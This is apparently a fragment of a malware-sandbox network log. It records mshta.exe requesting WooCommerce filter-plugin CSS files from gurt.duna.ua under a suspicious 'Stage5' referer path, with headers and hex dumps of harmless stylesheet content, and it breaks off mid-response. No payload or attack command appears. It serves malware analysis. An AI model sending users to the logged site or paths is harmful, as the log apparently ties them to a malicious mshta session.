                                                                                                                                                                                                      2024-10-27 06:35:12 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:12 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 4975
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-136f"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:12 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:12 UTC4975INData Raw: 2e 77 6f 6f 66 5f 74 65 78 74 5f 73 65 61 72 63 68 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 66 5f 74 65 78 74 5f 73 65 61 72 63 68 5f 67 6f 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 32 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 22 2e 2e 2f 69 6d 67 2f 6d 61 67 6e 69 66 79 69 6e 67 2d 67 6c 61 73 73 32 2e 73 76 67 22 29 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 20 21
                                                                                                                                                                                                      Data Ascii: .woof_text_search_container .woof_text_search_go{ display: block; width: 20px; height: 20px; margin-left: 3px; background: url("../img/magnifying-glass2.svg"); display: none; border: none !important; text-decoration: none !


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      8192.168.2.549712185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:12 UTC478OUTGET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:12 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:12 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 1256
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-4e8"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:12 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:12 UTC1256INData Raw: 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 3a 68 6f 76 65 72 2c 0a 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 2e 63 68 65 63 6b 65 64 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 34 39 35 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 33 34 34 39 35 65 3b 0a 7d 0a 0a 0a 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 70 78 3b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 0a
                                                                                                                                                                                                      Data Ascii: .woof_list_label li .woof_label_term:hover,.woof_list_label li .woof_label_term.checked { background-color: #34495e; border-color: #34495e;}.woof_list_label li { display: inline-block !important; margin: 2px; vertical-align: top;


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      9192.168.2.549713185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:13 UTC481OUTGET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:13 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:13 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 4701
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-125d"
                                                                                                                                                                                                      x-ray: wnp447:0.010/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:13 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:13 UTC4701INData Raw: 2e 77 6f 6f 66 5f 71 75 69 63 6b 5f 73 65 61 72 63 68 5f 77 72 61 70 65 72 20 2e 65 61 73 79 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 77 6f 6f 66 5f 71 75 69 63 6b 5f 73 65 61 72 63 68 5f 77 72 61 70 65 72 20 69 6e 70 75 74 23 77 6f 6f 66 5f 71 75 69 63 6b 5f 73 65 61 72 63 68 5f 66 6f 72 6d 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0a 7d 0a 2e 77 6f 6f 66 5f 71 74 5f 6b 65 79 5f 77 6f 72 64 73 7b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 69 74 69 61 6c 3b 0a 7d 0a 2e 65 61 73 79 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 66
                                                                                                                                                                                                      Data Ascii: .woof_quick_search_wraper .easy-autocomplete{ width: 100% !important;}.woof_quick_search_wraper input#woof_quick_search_form{ width: 100%; min-width: 250px;}.woof_qt_key_words{ line-height: initial;}.easy-autocomplete-container .woof


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      10192.168.2.549714185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:13 UTC477OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:14 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:13 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 57
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-39"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:13 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:14 UTC57INData Raw: 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 73 61 6c 65 73 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 3b 0a 7d
                                                                                                                                                                                                      Data Ascii: .woof_checkbox_sales_container{ margin-bottom: 4px;}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      11192.168.2.549715185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:14 UTC504OUTGET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:15 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:15 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 3138
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-c42"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:15 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:15 UTC3138INData Raw: 2f 2a 20 68 74 74 70 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 65 6c 6d 61 68 64 69 6d 2f 70 65 6e 2f 68 6c 6d 72 69 20 2a 2f 0a 64 6c 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 0a 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 64 64 2c 0a 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 64 74 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 75 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 2d 31 70 78 20 30 20 30 20 30 3b 0a 7d 0a 0a
                                                                                                                                                                                                      Data Ascii: /* http://codepen.io/elmahdim/pen/hlmri */dl.woof_select_radio_check{ margin: 0 !important;}.woof_select_radio_check dd,.woof_select_radio_check dt { margin: 0px; padding: 0px;}.woof_select_radio_check ul { margin: -1px 0 0 0;}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      12192.168.2.549716185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:14 UTC488OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:15 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:15 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 9449
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-24e9"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:15 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:15 UTC9449INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 77 69 64 74 68 3a 20 32 35 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 73 70 61 63 65 3a 20 31 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 73 70 61 63 65 5f 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 74 65 78 74 5f 74 6f 70 3a 20 30 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 68 6f 76 65 72 5f 74 65 78 74
                                                                                                                                                                                                      Data Ascii: :root { --woof-sd-ie-ch_width: 25px; --woof-sd-ie-ch_height: 25px; --woof-sd-ie-ch_space: 1px; --woof-sd-ie-ch_space_color: #ffffff; --woof-sd-ie-ch_text_top: 0; --woof-sd-ie-ch_text_color: #6d6d6d; --woof-sd-ie-ch_hover_text


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      13192.168.2.549717185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:16 UTC485OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:16 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:16 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 9373
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-249d"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:16 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:16 UTC9373INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 77 69 64 74 68 3a 20 32 35 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 73 70 61 63 65 3a 20 31 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 73 70 61 63 65 5f 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 74 65 78 74 5f 74 6f 70 3a 20 30 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 68 6f 76
                                                                                                                                                                                                      Data Ascii: :root { --woof-sd-ie-rad_width: 25px; --woof-sd-ie-rad_height: 25px; --woof-sd-ie-rad_space: 1px; --woof-sd-ie-rad_space_color: #ffffff; --woof-sd-ie-rad_text_top: 0; --woof-sd-ie-rad_text_color: #6d6d6d; --woof-sd-ie-rad_hov


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      14192.168.2.549718185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:16 UTC488OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:16 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:16 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 8973
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-230d"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:16 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:16 UTC8973INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 37 39 62 38 66 66 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 69 6d 61 67 65 3a 20 75 72 6c 28 29 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 6f 72 64 65 72 5f 63 6f 6c 6f 72 3a 20 23 37 39 62 38 66 66 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 6f 72 64 65 72 5f 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78
                                                                                                                                                                                                      Data Ascii: :root { --woof-sd-ie-sw_vertex_enabled_bg_color: #79b8ff; --woof-sd-ie-sw_vertex_enabled_bg_image: url(); --woof-sd-ie-sw_vertex_enabled_border_color: #79b8ff; --woof-sd-ie-sw_vertex_enabled_border_style: solid; --woof-sd-ie-sw_vertex


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      15192.168.2.549720185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:17 UTC485OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:17 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:17 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 5745
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-1671"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:17 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:17 UTC5745INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 77 69 64 74 68 3a 20 36 30 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 68 65 69 67 68 74 3a 20 36 30 70 78 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 73 68 6f 77 5f 74 6f 6f 6c 74 69 70 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 73 68 6f 77 5f 74 6f 6f 6c 74 69 70 5f 63 6f 75 6e 74 3a 20 62 6c 6f 63 6b 2d 69 6e 6c 69 6e 65 3b 0a 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 69 6d 61 67 65 3a 20 75 72 6c 28 29 3b 0a 20 20 20 20 2d 2d 77
                                                                                                                                                                                                      Data Ascii: :root { --woof-sd-ie-clr_width: 60px; --woof-sd-ie-clr_height: 60px; --woof-sd-ie-clr_show_tooltip: none; --woof-sd-ie-clr_show_tooltip_count: block-inline; --woof-sd-ie-clr_color: #000000; --woof-sd-ie-clr_image: url(); --w


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      16192.168.2.549721185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:17 UTC478OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:17 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:17 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 735
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-2df"
                                                                                                                                                                                                      x-ray: wnp447:0.010/wn447:0.000/
